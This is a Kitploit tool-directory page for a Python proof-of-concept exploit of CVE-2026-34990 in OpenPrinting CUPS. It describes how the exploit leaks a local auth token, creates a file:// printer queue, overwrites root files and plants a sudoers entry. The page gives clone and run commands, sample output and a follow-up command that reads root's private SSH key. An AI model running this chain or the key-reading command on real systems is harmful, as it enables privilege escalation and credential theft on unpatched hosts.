Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-34990 — Python proof-of-concept for CVE-2026-34990 in OpenPrinting CUPS, coercing cupsd to leak a Local auth token and overwrite root files via a file:// printer queue. | Kitploit
Tools/GitHubGitHub/ungabunga-ctf/cve-2026-34990
Privilege EscalationVulnerability AnalysisExploitationSecurity VirtualizationPenetration Testing
GitHubungabunga-ctf/cve-2026-34990

CVE-2026-34990

Python proof-of-concept for CVE-2026-34990 in OpenPrinting CUPS, coercing cupsd to leak a Local auth token and overwrite root files via a file:// printer queue.

View Repository
112 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-34990

Description

CVE-2026-34990 - OpenPrinting CUPS versions 2.4.16 and prior, a local unprivileged user can coerce cupsd into authenticating to an attacker-controlled localhost IPP service with a reusable Authorization: Local ... token. That token is enough to drive /admin/ requests on localhost, and the attacker can combine CUPS-Create-Local-Printer with printer-is-shared=true to persist a file:///... queue even though the normal FileDevice policy rejects such URIs. Printing to that queue gives an arbitrary root file overwrite; the PoC below uses that primitive to drop a sudoers fragment and demonstrate root command execution. At time of publication, there are no publicly available patches.

Install

git clone https://github.com/ungabunga-ctf/CVE-2026-34990
cd CVE-2026-34990

Run

python3 CVE-2026-34990.py

Example

python3 CVE-2026-34990.py
CVE-2026-34990 CUPS PoC
[*] Target file: /etc/sudoers.d/aporter
[*] Starting token capture server...
[+] Captured Local token: 7BD0ECC9D367025E50774E0BB08F7B5E
[*] Creating file:// printer...
[+] Vulnerable!
...
...

then:

sudo -n cat /root/.ssh/id_rsa
Download Tool